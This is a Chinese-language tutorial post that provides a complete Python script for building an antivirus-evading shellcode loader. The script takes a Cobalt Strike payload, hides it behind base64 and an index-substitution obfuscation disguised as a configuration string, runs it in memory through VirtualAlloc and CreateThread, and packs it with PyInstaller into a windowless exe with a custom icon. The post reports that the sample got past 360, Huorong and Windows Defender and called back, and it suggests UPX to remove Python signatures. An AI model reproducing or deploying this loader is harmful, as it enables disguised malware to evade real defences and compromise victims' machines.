python过杀软新
利用python加载shellcode过360、火绒等杀软
先上代码
将以下代码保存到 mt.py
shell
import base64
import os
import shutil
buf = b"这里替换shellcode"
b64buf = base64.b64encode(buf)
lzsds = """
import ctypes
import base64
shellcode= base64.b64decode(\""""+b64buf.decode()+"""\")
shellcode= bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype= ctypes.c_uint64
ptr= ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf= (ctypes.c_char *len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(ptr),
buf,
ctypes.c_int(len(shellcode))
)
handle= ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
"""
def arraydecode(rr):
list_char = "This is a configuration file please do not delete,=configuration No 'bjABkmpxyz-RSUOPQVEFGHIJKLMWXYZ_3102qvw485CD967=)"
# 数组加密
index_b = []
for i in str(rr):
index_a = list_char.index(str(i))
index_b.append(index_a)
return index_b
ba64lzsds = base64.b64encode(lzsds.encode("utf-8")).decode()
sdata = arraydecode(ba64lzsds)
#打包
with open("note.py",'w',encoding="utf-8") as f:
f.write("""import base64
import ctypes
import os
"""+"\n")
f.write("data = "+str(sdata)+"\n")
f.write("""def j(index_b):
list_char = "This is a configuration file please do not delete,=configuration No 'bjABkmpxyz-RSUOPQVEFGHIJKLMWXYZ_3102qvw485CD967=)"
index_c = ""
for i in index_b:
index_c += list_char[i]
return index_c
data_j = j(data)
code = base64.b64decode(data_j).decode('utf-8')
exec(code)
""")
import PyInstaller.__main__
try:
# 获取要打包的脚本路径
script_file = "note.py"
# 获取 PyInstaller 路径
pyinstaller_path = os.path.dirname(PyInstaller.__main__.__file__)
# 设置打包选项
build_args = [
"-F", # 生成一个单独的可执行文件
"-w", # 不显示命令行窗口
"-i=1.ico", # ico
script_file # 添加要打包的脚本路径
]
# 执行打包命令
PyInstaller.__main__.run(build_args)
except:
print("exe在dist文件夹内")
shutil.rmtree("build")
shutil.rmtree("__pycache__")
os.remove("note.spec")
os.remove("note.py")
如何使用
1、使用cs生成python的payload替换掉mt.py代码中shellcode
data:image/s3,"s3://crabby-images/5464b/5464b8c6e4c507c0224b9a057b9559dc39134a03" alt=""
data:image/s3,"s3://crabby-images/6e220/6e220da2589c7b81963468827cf326e50808863b" alt=""
data:image/s3,"s3://crabby-images/57b42/57b42752f3d0b9e03dcbca529ca83f13e2ab6b11" alt=""
2、准备一个ico图标,放在和mt.py同一目录命名为1.ico,这点可以自行修改。
data:image/s3,"s3://crabby-images/689c2/689c2a76ed729d5cd08b5eac29f187c1c755ee92" alt=""
一键生成
替换掉代码里的shellcode之后,直接运行
shell
python 文件名.py
data:image/s3,"s3://crabby-images/9aac9/9aac9c4e37d05192842d9ace0d9047ca1d1dae9b" alt=""
exe会生成在在当前目录的dist目录下
data:image/s3,"s3://crabby-images/2b36e/2b36eff0dce0e4e3080ee6ad52a0de3837700c70" alt=""
动态上线-成功
复制到我的另一台电脑,开启360核晶和windwos defender
复制过去,无检测拦截
data:image/s3,"s3://crabby-images/0e18c/0e18cd3c7cce0104353fbd1472ddfa04f4134ab0" alt=""
双击运行,360无拦截成功上线,火绒也能过
data:image/s3,"s3://crabby-images/73794/73794abc9b653acdd5ece32b4321553dfb830ac0" alt=""
data:image/s3,"s3://crabby-images/7cb3b/7cb3bbc3e4f61f6035b7a2e0599992ddc4890df4" alt=""
主动查杀-成功
data:image/s3,"s3://crabby-images/0a5c0/0a5c0d722cd953e7cb0759080df60c51dbb84d68" alt=""
有时候会检测到存在python的特征会报毒,但是运行不影响上线,可以使用upx进行压缩,去除python的特征
upx下载地址 https://github.com/upx/upx
shell
压缩命令
upx -d note.exe
data:image/s3,"s3://crabby-images/ecda9/ecda9d1bfa1b0cb5a361a7c7f6af190ec46bd658" alt=""